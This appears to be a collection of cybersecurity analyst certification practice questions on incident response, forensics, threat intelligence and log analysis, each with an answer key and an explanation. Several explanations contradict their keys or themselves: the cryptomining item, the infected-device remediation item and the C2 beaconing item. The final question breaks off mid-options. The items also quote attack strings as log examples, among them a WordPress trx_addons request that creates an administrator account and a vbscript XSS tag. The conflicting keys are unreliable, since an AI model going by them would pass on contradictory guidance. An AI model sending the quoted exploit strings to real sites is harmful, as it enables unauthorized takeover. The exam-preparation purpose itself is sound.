Single Pane of Glass (SPOG): This concept refers to a unified dashboard or interface that aggregates information from various sources into a single view. By using a SPOG, your security operations team can access and analyze threat intelligence data from multiple feeds without switching between different tools or portals. It streamlines workflows, reduces redundancy, and enhances efficiency.
Benefits:
Centralized View: All threat data is accessible in one place, making it easier to correlate and prioritize incidents.
Reduced Complexity: No need to manage multiple interfaces or logins.
Improved Decision-Making: Analysts can quickly identify patterns and respond to threats more effectively.
Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?
A. MITRE ATT&CK
B. Cyber Kill Cham
C. OWASP
D. STIX/TAXI
Correct Answer: A
A security analyst would most likely use MITRE ATT&CK for comparing Tactics, Techniques, and Procedures (TTPs) between different known adversaries of an organization.
MITRE refers to the organization that developed this framework. The acronym ATT&CK stands for Adversarial Tactics, Techniques & Common Knowledge. It reflects the focus of the framework: understanding.
MITRE ATT&CK is a comprehensive framework that provides a detailed matrix of adversary behaviors across various stages of the attack lifecycle. It helps analysts understand and compare the techniques used by threat actors, aiding in threat intelligence, incident response, and vulnerability management.
An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?
A. Eradication
B. Recovery
C. Containment
D. Preparation
Correct Answer: A
The step that describes the analyst actively removing the vulnerability from the system is A. Eradication.
During this phase, the focus is on completely eliminating the threat or vulnerability to prevent it from causing further harm. Once eradication is complete, the system can move toward recovery and restoration.
Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer’s customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?
A. Isolate Joe’s PC from the network
B. Reimage the PC based on standard operating procedures
C. Initiate a remote wipe of Joe’s PC using mobile device management
D. Perform no action until HR or legal counsel advises on next steps
Correct Answer: D
Legal Considerations: Joe’s actions may have legal implications, especially if he’s soliciting customers while still employed. It’s essential to consult with legal counsel to determine the appropriate course of action.
HR Involvement: HR should be informed promptly. They can guide the organization on how to handle the situation, including any necessary disciplinary actions or termination procedures.
Preserving Evidence: Isolating Joe’s PC or wiping it remotely could inadvertently destroy evidence that might be relevant in any future legal proceedings. It’s best to wait for professional advice.
Incident response should always be coordinated with legal and HR departments to ensure compliance and protect the organization’s interests.
The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?
A. Reduce the administrator and privileged access accounts
B. Employ a network-based IDS
C. Conduct thorough incident response
D. Enable SSO to enterprise applications
Correct Answer: A
These accounts often have elevated permissions and are attractive targets for attackers. By minimizing their numbers and ensuring strict access controls, organizations can significantly enhance security.
While the other options are important, they may not directly address the attack surface reduction as effectively as limiting privileged accounts.
For instance:
Employing a network-based IDS (Option B) helps detect and respond to network-based attacks, but it doesn’t directly reduce the attack surface.
Conducting thorough incident response (Option C) is crucial, but it’s reactive rather than preventive.
Enabling SSO to enterprise applications (Option D) improves user experience but doesn’t inherently reduce the attack surface.
During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?
A. Clone the virtual server for forensic analysis
B. Log m to the affected server and begin analysis of the logs
C. Restore from the last known-good backup to confirm there was no loss of connectivity
D. Shut down the affected server immediately
Correct Answer: A
Creating a clone of the affected server ensures that the original system remains untouched during the investigation. The cloned server can be analyzed for evidence without risking further damage or data loss. This step aligns with the preservation phase of incident response, where maintaining the integrity of potential evidence is crucial.
A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?
A. C2 beaconing activity
B. Data exfiltration
C. Anomalous activity on unexpected ports
D. Network host IP address scanning
E. A rogue network device
Correct Answer: A
Considering the information provided, the most likely explanation is C2 beaconing activity (A). Although it’s unusual for C2 traffic to occur continuously during work hours, it’s essential to investigate further to confirm the cause. Additionally, consider checking for compromised software or malware on the server.
C2 Beaconing Activity (A): Command-and-control (C2) beaconing typically involves periodic communication from an infected host to a remote server controlled by an attacker. However, the consistent traffic pattern around the clock during work hours suggests that this is unlikely, as C2 activity usually occurs intermittently or at specific intervals.
Data Exfiltration (B): Data exfiltration involves unauthorized transfer of sensitive information from an internal network to an external location. While this could be a possibility, the continuous traffic pattern both during and after work hours doesn’t align with typical exfiltration behavior.
Anomalous Activity on Unexpected Ports (C): This option refers to unusual traffic on non-standard ports. While it’s essential to investigate further, the fact that the traffic occurs consistently during work hours makes it less likely to be an anomaly.
Network Host IP Address Scanning (D): Scanning activity involves probing other hosts or networks for vulnerabilities. However, if the server is initiating these connections, it’s less likely to be scanning other hosts. Scanning activity is usually inbound, not outbound.
A Rogue Network Device (E): A rogue network device, such as an unauthorized router or switch, could cause unexpected traffic patterns. However, this explanation seems less probable given the consistent behavior during work hours.
New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?
A. Human resources must email a copy of a user agreement to all new employees
B. Supervisors must get verbal confirmation from new employees indicating they have read the user agreement
C. All new employees must take a test about the company security policy during the onboardmg process
D. All new employees must sign a user agreement to acknowledge the company security policy
Correct Answer: D
Given the situation, the SOC manager would likely recommend option D: All new employees must sign a user agreement to acknowledge the company security policy.
User Agreement: Having new employees sign a user agreement explicitly acknowledges their awareness of company policies. This creates a formal record and ensures accountability.
Verbal Confirmation (Option B): Relying solely on verbal confirmation may not be sufficient, as it lacks a documented record. Verbal agreements can be easily forgotten or misunderstood.
Emailing a Copy (Option A): While sending an email with the policy is helpful, it doesn’t guarantee that employees will read and understand it thoroughly.
Taking a Test (Option C): While testing knowledge is valuable, it might be time-consuming and may not be practical during the onboarding process.
By having new employees sign a user agreement, the organization establishes a lear understanding of the policy and ensures compliance. Additionally, periodic reminders and training sessions can reinforce policy awareness.
An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?
A. Information sharing organization
B. Blogs/forums
C. Cybersecurity incident response team
D. Deep/dark web
Correct Answer: A
Given the critical nature of the company’s supply chain and the potential impact of a ransomware attack, the best threat intelligence source to learn about this new campaign would be information sharing organizations.
These organizations aggregate and disseminate timely threat intelligence, often collaborating with industry experts, government agencies, and other security professionals.
An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?
A. To satisfy regulatory requirements for incident reporting
B. To hold other departments accountable
C. To identify areas of improvement in the incident response process
D. To highlight the notable practices of the organization’s incident response team
Correct Answer: C
The most likely reason to include lessons learned in an after-action report is C.
To identify areas of improvement in the incident response process. By analyzing what went well and what could be improved during the incident response, organizations can enhance their security posture, refine their processes, and better prepare for future incidents.
While satisfying regulatory requirements (option A) is important, the primary focus of lessons learned is on process improvement rather than compliance.
Holding other departments accountable (option B) and highlighting notable practices (option D) are secondary considerations compared to learning from the incident to prevent recurrence.
A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
A. Hacktivist
B. Advanced persistent threat
C. Insider threat
D. Script kiddie
Correct Answer: C
The user in this scenario has become a C. Insider threat. An insider threat refers to someone within an organization who misuses their access or privileges to intentionally or unintentionally cause harm to the organization’s security, data, or systems. In this case, the user’s actions of downloading and spreading malware would fall under the category of insider threat.
During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?
A. Disk contents
B. Backup data
C. Temporary files
D. Running processes
Correct Answer: D
When collecting evidence during an incident, the order of volatility is crucial. Analysts should prioritize running processes first, as they are the most volatile and can change rapidly. After that, they can proceed to collect other data such as temporary files, disk contents, and backup data. So the correct answer is D. Running processes.
An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?
A. Take a snapshot of the compromised server and verify its integrity
B. Restore the affected server to remove any malware
C. Contact the appropriate government agency to investigate
D. Research the malware strain to perform attribution
Correct Answer: A
Given the situation, the CSIRT should prioritize the following actions:
Take a snapshot of the compromised server and verify its integrity (Option A): Creating a snapshot allows for forensic analysis without altering the original state. Verifying integrity ensures that the snapshot accurately represents the compromised system.
Research the malware strain to perform attribution (Option D): Understanding the malware helps identify the threat actor, their motives, and potential impact. This information informs incident response and future prevention measures.
Restore the affected server (Option B): After analysis, if the server is deemed safe, restoring it ensures business continuity. However, this step should follow snapshot creation and integrity verification.
Contacting government agencies (Option C): While important for certain incidents (e.g., nation-state attacks), it’s not the immediate next step. Focus on technical investigation first.
Remember, confidentiality and thorough analysis are critical. Availability can be restored later once security is assured.
A security analyst is writing a shell script to identify IP addresses from the same country.
Which of the following functions would help the analyst achieve the objective?
A. function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }
B. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }
C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }
D. function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }
Correct Answer: B
To identify IP addresses from the same country, the most relevant function is B. function x(). Let’s break down why:
Function w() uses ping to measure round-trip time to a host, but it doesn’t provide country information.
Function y() performs a reverse DNS lookup (dig -x) and extracts the PTR record, but this doesn’t directly give country details.
Function z() traces the route to a host, but it doesn’t focus on country information.
Now, let’s look at Function x():
function x() {
info=$(geoiplookup $1)
echo “$1 | $info”
}
This function uses the geoiplookup command, which queries a GeoIP database to determine the country associated with an IP address. It’s the most suitable choice for your objective.
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region.
Which of the following shell script functions could help achieve the goal?
A. function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }
B. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }
D. function z() { c=$(geoiplookup$1) && echo “$1 | $c” }
Correct Answer: C
The shell script function that could help identify possible network addresses from different source networks belonging to the same company and region is function y. Here’s how it works:
function y() {
dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F “.in-addr” ‘{print $1}’).origin.asn.cymru.com TXT +short
}
This function takes an IP address as an argument and performs two DNS lookups using the dig command. It retrieves information related to the address, including its origin and Autonomous System Number (ASN). The output provides valuable context for identifying network addresses within the same company and regio
While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?
A. Shut the network down immediately and call the next person in the chain of command.
B. Determine what attack the odd characters are indicative of.
C. Utilize the correct attack framework and determine what the incident response will consist of.
D. Notify the local law enforcement for incident response.
Correct Answer: B
Shutting down the network immediately might be an overreaction at this point. Investigate further before taking such drastic action.
Utilizing the correct attack framework (Option C) is a good approach, but first, you need to identify the type of attack.
Notifying local law enforcement (Option D) is premature. Law enforcement typically gets involved after a thorough assessment.
Focus on analyzing the odd characters in the request line. Look for patterns, research known attack techniques, and consider using threat intelligence sources to identify the specific attack. Once you have more information, proceed with incident response accordingly.
A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?
A. Service-level agreement
B. Change management plan
C. Incident response plan
D. Memorandum of understanding
Correct Answer: C
The security team should create an Incident Response Plan (IRP) to address this issue. An IRP outlines the procedures, roles, and responsibilities for handling security incidents. It ensures a coordinated and effective response, including identifying who should take specific actions during and after an incident. The IRP helps streamline decision-making and ensures that the right individuals are involved in the next steps.
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?
A. Geoblock the offending source country.
B. Block the IP range of the scans at the network firewall.
C. Perform a historical trend analysis and look for similar scanning activity.
D. Block the specific IP address of the scans at the network firewall.
Correct Answer: B
Given the situation, the best mitigation technique would be B. Block the IP range of the scans at the network firewall.
Geoblocking (option A) might seem like a straightforward solution, but it can have unintended consequences. Blocking an entire country could inadvertently affect legitimate traffic or hinder business operations if there are any legitimate connections from that country.
Blocking the specific IP address (option D) is reactive and may not prevent other scanners from using different IP addresses. It’s better to address the broader range of IPs involved in the scanning activity.
Performing historical trend analysis (option C) is valuable for understanding the context and identifying patterns, but it won’t immediately stop the ongoing scanning activity.
Blocking the IP range of the scans at the network firewall (option B) is a targeted approach. By doing so, you can prevent further scanning attempts from that specific range without affecting other legitimate traffic.
Remember that timely incident response and continuous monitoring are crucial in cybersecurity. Regularly reviewing logs, analyzing threat intelligence, and staying informed about emerging threats will help you proactively address security incidents.
An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:
/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator
Which of the following controls would work best to mitigate the attack represented by this snippet?
A. Limit user creation to administrators only.
B. Limit layout creation to administrators only.
C. Set the directory trx_addons to read only for all users.
D. Set the directory V2 to read only for all users.
Correct Answer: A
The snippet provided appears to be an attempt to exploit a WordPress vulnerability.
The /wp-json/trx_addons/V2/get/sc_layout part indicates an endpoint in the WordPress REST API.
The sc=wp_insert_user&role=administrator query parameters suggest an attempt to create a new user with the “administrator” role.
A. Limit user creation to administrators only:
This control restricts user creation to administrators, which is a good practice. Tt won’t directly address the specific vulnerability in the snippet, it does However mitigate the specific attack.
B. Limit layout creation to administrators only:
Layout creation doesn’t seem relevant to the snippet. It’s unlikely to mitigate the attack.
C. Set the directory trx_addons to read-only for all users:
This option is more specific to the vulnerability. If the trx_addons directory contains sensitive files or scripts, setting it to read-only could prevent unauthorized modifications, but making the change to Read Only for All Users would prevent authentic Administrator write permissions as well.
D. Set the directory V2 to read-only for all users:
The V2 directory isn’t directly related to the snippet. Focusing on the trx_addons directory is more appropriate.
A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?
A. Implementing multifactor authentication on the server OS
B. Hashing user passwords on the web application
C. Performing input validation before allowing submission
D. Segmenting the network between the users and the web server
Correct Answer: C
*Input Validation: Ensuring that user inputs are properly validated before processing them is crucial. By validating input data, you can prevent malicious payloads from being submitted. Common techniques include:
* Whitelisting: Only allowing specific characters or patterns (e.g., alphanumeric characters) in input fields.
* Blacklisting: Explicitly blocking known malicious inputs (e.g., SQL injection strings).
* Regular Expressions (Regex): Using regex patterns to validate input (e.g., email addresses, phone numbers).
Hashing User Passwords: While hashing passwords is essential for security, it doesn’t directly address the issue of input validation. Hashing ensures that even if an attacker gains access to the password database, they won’t see plaintext passwords. However, it doesn’t prevent the initial vulnerability.
Multifactor Authentication (MFA): MFA adds an extra layer of security by requiring users to provide additional proof of identity (e.g., a one-time code sent to their phone). While MFA is important, it doesn’t directly address the vulnerability described in the scenario.
Network Segmentation: Segmenting the network between users and the web server is a good practice for overall security, but it doesn’t specifically address the vulnerability related to input validation.
In summary, input validation helps prevent malicious data from being processed, making it the most relevant recommendation in this context.
A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?
A. Mean time between failures
B. Mean time to detect
C. Mean time to remediate
D. Mean time to contain
Correct Answer: D
Mean Time to Contain (MTTC) measures the average time it takes to isolate and control a security incident after its initial detection. It focuses on the critical period between detection and containment, which directly impacts the spread of malware within the network.
Mean Time to Detect (MTTD), on the other hand, measures the average time it takes to identify a security incident. While important, MTTD alone doesn’t account for the containment effort.
Mean Time to Remediate (MTTR) measures the average time it takes to fully remediate an incident after detection. While relevant, it doesn’t specifically address containment speed.
Therefore, including MTTC in the executive briefs provides a clear indicator of the organization’s ability to swiftly contain and mitigate security incidents, minimizing their impact on critical systems.
An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:
- created the initial evidence log.
- disabled the wireless adapter on the device.
- interviewed the employee, who was unable to identify the website that was accessed.
- reviewed the web proxy traffic logs.
Which of the following should the analyst do to remediate the infected device?
A. Update the system firmware and reimage the hardware.
B. Install an additional malware scanner that will send email alerts to the analyst.
C. Configure the system to use a proxy server for Internet access.
D. Delete the user profile and restore data from backup.
Correct Answer: A
Given the options, the most relevant action is C. Configure the system to use a proxy server for Internet access. This step can help monitor and filter traffic, preventing future infections.
To effectively remediate the infected device, the incident response analyst should follow these steps:
Isolate the Device: Disable network access for the infected endpoint to prevent lateral movement. This step helps contain the malware and prevent further spread.
Identify the Type, Scope, and Timeline of the Malware Infection: Understand the nature of the malware, its impact, and when it occurred. This information informs subsequent actions.
Create an Image of the Infected System: Before making any changes, create a forensic image of the compromised system. This preserves evidence for further analysis and legal purposes.
Remove the Malware (if possible): Use reliable malware scanning and detection tools to identify and remove the malicious software. Ensure that the removal process doesn’t inadvertently cause data loss or further damage.
Reset Credentials and Invalidate Sessions: Change passwords and usernames associated with the infected device. Invalidate any active web sessions to prevent unauthorized access.
Review Access to Impacted Applications: Assess which applications or services were accessed from the infected device. Close any potential entry points used by the malware.
A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?
A. High GPU utilization
B. Bandwidth consumption
C. Unauthorized changes
D. Unusual traffic spikes
Correct Answer: A
The most likely indicator that cryptomining is occurring would be high CPU usage. When systems are hijacked for cryptojacking, they use the stolen compute resources to mine cryptocurrency in the background. Victims might notice slower performance, lags in execution, overheating, excessive power consumption, or unusually high cloud computing bills. While other indicators like bandwidth consumption and unusual traffic spikes could be relevant, high CPU usage is a stronger signal in this context. Keep an eye out for consistent and abnormal CPU utilization across resources or groups of cloud resources.
A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?
A. Help desk
B. Law enforcement
C. Legal department
D. Board member
Correct Answer: C
Legal Implications: The legal department is responsible for ensuring that the company complies with all relevant laws, regulations, and policies. Inappropriate use of resources can have legal implications, and the legal team can provide guidance on how to handle such situations within the bounds of the law.
Policy Enforcement: The legal department plays a crucial role in enforcing company policies. They can advise on the appropriate steps to take, including any disciplinary actions or legal consequences.
Risk Mitigation: Escalating the issue to the legal department helps mitigate risks associated with inappropriate resource use. They can assess the severity of the incident, evaluate potential liabilities, and recommend appropriate actions.
While the help desk, law enforcement, and board members may be involved at later stages, the legal department should be the initial point of escalation to ensure compliance with legal requirements and company policies. Keep in mind that industry best practices may vary, but involving legal experts early on is generally advisable.
Given the following CVSS string:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Which of the following attributes correctly describes this vulnerability?
A. A user is required to exploit this vulnerability.
B. The vulnerability is network based.
C. The vulnerability does not affect confidentiality.
D. The complexity to exploit the vulnerability is high.
Correct Answer: B
The CVSS string provided corresponds to a vulnerability with the following attributes:
Base Score: 8.8 (High severity)
Attack Vector (AV): Network (AV:N)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): None (PR:N)
User Interaction (UI): None (UI:N)
Scope (S): Unchanged (S:U)
Confidentiality Impact ©: High (C:H)
Integrity Impact (I): High (I:H)
Availability Impact (A): High (A:H)
B. The vulnerability is network based.
Option A is incorrect: Privileges Required (PR): None (PR:N)
Option C is incorrect: Confidentiality Impact (C): High (C:H)
Option D is incorrect: Attack Complexity (AC): Low (AC:L)
Which of the following best describes the goal of a tabletop exercise?
A. To test possible incident scenarios and how to react properly
B. To perform attack exercises to check response effectiveness
C. To understand existing threat actors and how to replicate their techniques
D. To check the effectiveness of the business continuity plan
Correct Answer: A
The goal of a tabletop exercise is A. To test possible incident scenarios and how to react properly. These exercises simulate various security incidents, allowing participants to discuss and practice their response strategies, identify gaps, and improve incident handling procedures. They are valuable for enhancing preparedness and coordination within an organization.
A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on the device is not modified?
A. Generate a hash value and make a backup image.
B. Encrypt the device to ensure confidentiality of the data.
C. Protect the device with a complex password.
D. Perform a memory scan dump to collect residual data
Correct Answer: A
Hash Value and Backup Image:
* Generating a hash value (such as MD5, SHA-256, etc.) ensures data integrity. By calculating a hash of the original hard drive, you create a unique fingerprint that represents the entire content.
* Making a backup image (also known as a forensic image) involves creating a bit-for-bit copy of the hard drive. This image can be used for analysis without altering the original data.
* The hash value of the original drive and the backup image should match if no modifications occur during the preservation process.
Other Options:
B. Encrypt the device: Encryption ensures confidentiality but doesn’t prevent modification.
C. Protect with a complex password: A password protects access but doesn’t prevent data alteration.
D. Perform a memory scan dump: This collects volatile memory data, not the entire hard drive content.
A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?
A. The server was configured to use SSL to securely transmit data.
B. The server was supporting weak TLS protocols for client connections.
C. The malware infected all the web servers in the pool.
D. The digital certificate on the web server was self-signed.
Correct Answer: D
A. The server was configured to use SSL to securely transmit data.
While SSL (Secure Sockets Layer) is essential for secure data transmission, it doesn’t directly impact trust issues reported by users. SSL ensures encryption, but it doesn’t address trustworthiness concerns.
B. The server was supporting weak TLS protocols for client connections.
Weak TLS (Transport Layer Security) protocols can indeed affect trust. If the server supports outdated or insecure TLS versions (e.g., TLS 1.0 or 1.1), it could compromise security and lead to trust issues.
C. The malware infected all the web servers in the pool.
Malware could certainly cause trust issues, but it’s not necessarily the most likely cause. We need more evidence to confirm this.
D. The digital certificate on the web server was self-signed.
This is a strong possibility. Self-signed certificates are not issued by a trusted certificate authority (CA), leading to trust warnings in browsers. Users might perceive the site as untrustworthy due to the self-signed certificate.
Conclusion: The most likely cause of the trust issue is option D—the self-signed digital certificate on the web server.
A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?
A. Interview the users who access these systems.
B. Scan the systems to see which vulnerabilities currently exist.
C. Configure alerts for vendor-specific zero-day exploits.
D. Determine the asset value of each system.
Correct Answer: D
Prioritizing systems based on their asset value is a crucial step in effective risk management and security planning. Let’s break down why this is the best approach:
Asset Valuation: Understanding the value of each system helps the security analyst assess its importance to the organization. Some systems may host critical data (e.g., customer records, financial information), while others may be less significant. By determining asset value, the analyst can allocate resources appropriately.
Risk Assessment: High-value assets are typically more attractive targets for attackers. By prioritizing them, the analyst can focus on protecting what matters most. This aligns with the organization’s overall risk management strategy.
Business Impact: The impact of a security incident on business operations depends on the affected system’s value. For example:
* A breach of a customer database could lead to reputational damage, legal consequences, and financial losses.
* An internal collaboration tool being compromised might have less severe consequences.
Compliance Requirements: Asset valuation also helps meet compliance requirements. Regulations often mandate protection of specific types of data (e.g., personal information, health records). Prioritizing high-value assets ensures compliance with relevant standards.
While interviewing users and scanning for vulnerabilities are essential tasks, determining asset value provides the foundational context for effective security decision-making. Once the analyst knows which systems are critical, they can proceed with vulnerability assessments, user interviews, and other risk management activities.
Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?
A. SLA
B. LOI
C. MOU
D. KPI
Correct Answer: A
The document that defines the expectation for network customers regarding patching during specific hours (between 2:00 a.m. and 4:00 a.m.) is typically an SLA (Service Level Agreement). SLAs outline the agreed-upon service levels, including maintenance windows, response times, and other performance metrics. It ensures alignment between service providers and customers.
A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application:
getConnection(database01,”alpha” ,”AxTv.127GdCx94GTd”);
Which of the following is the most likely vulnerability in this system?
A. Lack of input validation
B. SQL injection
C. Hard-coded credential
D. Buffer overflow
Correct Answer: C
The most likely vulnerability in this system is C. Hard-coded credential.
The presence of the hardcoded username (“alpha”) and password (“AxTv.127GdCx94GTd”) within the getConnection function call indicates that sensitive credentials are directly embedded in the code.
This practice poses a significant security risk, as anyone with access to the code can easily extract these credentials and potentially gain unauthorized access to the database.
To improve security, it’s essential to use secure credential management practices, such as storing credentials in a separate, encrypted configuration file or using environment variables.
Additionally, regular code reviews and vulnerability assessments can help identify and address such issues.
An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Choose two).
A. Drop the tables on the database server to prevent data exfiltration.
B. Deploy EDR on the web server and the database server to reduce the adversary’s capabilities.
C. Stop the httpd service on the web server so that the adversary can not use web exploits.
D. Use microsegmentation to restrict connectivity to/from the web and database servers.
E. Comment out the HTTP account in the /etc/passwd file of the web server.
F. Move the database from the database server to the web server.
Correct Answer: B, D
Both Options B (EDR deployment) and D (microsegmentation) contain the adversary while maintaining the necessary functionality. These controls strike a balance between security and operational requirements.
Drop the tables on the database server to prevent data exfiltration (Option A): While this action would prevent data exfiltration, it could disrupt legitimate operations and potentially cause data loss. It’s not a recommended compensating control.
Deploy EDR (Endpoint Detection and Response) on the web server and the database server (Option B): EDR solutions monitor and respond to suspicious activities on endpoints. Deploying EDR can enhance threat detection and reduce the adversary’s capabilities. This is a good choice.
Stop the httpd service on the web server (Option C): Disabling the web server would indeed prevent the adversary from using web exploits. However, it would also render the web service inaccessible, which conflicts with the requirement to keep it running.
Use microsegmentation to restrict connectivity (Option D): Microsegmentation involves dividing the network into smaller segments and applying access controls. By restricting communication between the web and database servers, you can limit the adversary’s lateral movement. This is another effective control.
Comment out the HTTP account in the /etc/passwd file of the web server (Option E): Modifying the /etc/passwd file is not a recommended compensating control. It could lead to unintended consequences and may not effectively contain the adversary.
Move the database from the database server to the web server (Option F): Consolidating the database onto the web server is not advisable. It violates the principle of separation of concerns and could expose sensitive data to the internet.
An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?
A. Disable the user’s network account and access to web resources.
B. Make a copy of the files as a backup on the server.
C. Place a legal hold on the device and the user’s network share.
D. Make a forensic image of the device and create a SHA-1 hash.
Correct Answer: D
This approach ensures that a complete and exact copy of all the data on the device is made, which is essential for a forensic investigation. The SHA-1 hash is used to verify the integrity of the data, ensuring that the forensic image is an exact, unaltered copy of the original data. This is critical for legal and investigative purposes, as it ensures the admissibility of the evidence in any potential legal proceedings.
A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?
A. Data exfiltration
B. Rogue device
C. Scanning
D. Beaconing
Correct Answer: D
Based on the information provided, the activity you’re observing is likely beaconing. Beaconing refers to regular, periodic communication between a compromised internal host and an external server. It’s often associated with malware or command-and-control (C2) communication. In contrast, scanning typically involves probing external hosts to identify vulnerabilities or services.
A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?
A. SIEM
B. XDR
C. SOAR
D. EDR
Correct Answer: C
Given the situation, SOAR would be the most effective choice for decreasing the workload without increasing staff. Let me explain why:
SIEM (Security Information and Event Management): SIEM systems collect and analyze security event data from various sources, but they don’t directly reduce workload. They are more focused on monitoring and alerting.
XDR (Extended Detection and Response): XDR solutions provide advanced threat detection and response capabilities, but they don’t inherently reduce workload. They might actually increase workload due to additional alerts and investigations.
SOAR (Security Orchestration, Automation, and Response): SOAR platforms automate repetitive security tasks, orchestrate incident response processes, and integrate with various security tools. By automating incident response workflows, SOAR can significantly reduce manual effort, streamline processes, and improve efficiency. It allows security analysts to focus on more complex tasks while routine actions are handled automatically.
EDR (Endpoint Detection and Response): EDR tools focus on detecting and responding to threats at the endpoint level. While they are essential for security, they don’t directly address workload reduction.
In summary, SOAR provides the best solution for managing increased workload efficiently by automating repetitive tasks and orchestrating incident response processes.
An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?
A. Insider threat
B. Ransomware group
C. Nation-state
D. Organized crime
Correct Answer: C
Given the context of seemingly unlimited time and resources, the threat actor most likely falls into the “Nation-state” category.
Nation-state actors are typically well-funded, highly skilled, and have extensive resources at their disposal. They engage in cyber espionage, political influence, and other strategic activities.
While other threat actors like ransomware groups and organized crime may also pose significant risks, the combination of unlimited resources and time aligns more closely with nation-state capabilities.
While reviewing web server logs, a security analyst found the following line:
< IMG SRC=’vbscript:msgbox(“test”)’ >
Which of the following malicious activities was attempted?
A. Command injection
B. XML injection
C. Server-side request forgery
D. Cross-site scripting
Correct Answer: D
The malicious activity attempted in this case is Cross-site scripting (XSS).
The provided line contains a script embedded within an image tag (<img></img>), which executes VBScript code (msgbox(“test”)).
This code would display a message box with the text “test” when the image is loaded by a victim’s browser.
XSS attacks allow an attacker to inject malicious scripts into web pages viewed by other users, potentially compromising their data or executing unauthorized actions.
A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?
A. config.ini
B. ntds.dit
C. Master boot record
D. Registry
Correct Answer: D
The correct answer is D. Registry. The Windows Registry contains configuration keys and values that control various aspects of the operating system and installed applications. It’s a centralized database where system settings, user preferences, and hardware configurations are stored.
A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://office365password.acme.co. The site’s standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?
A. This is a normal password change URL.
B. The security operations center is performing a routine password audit.
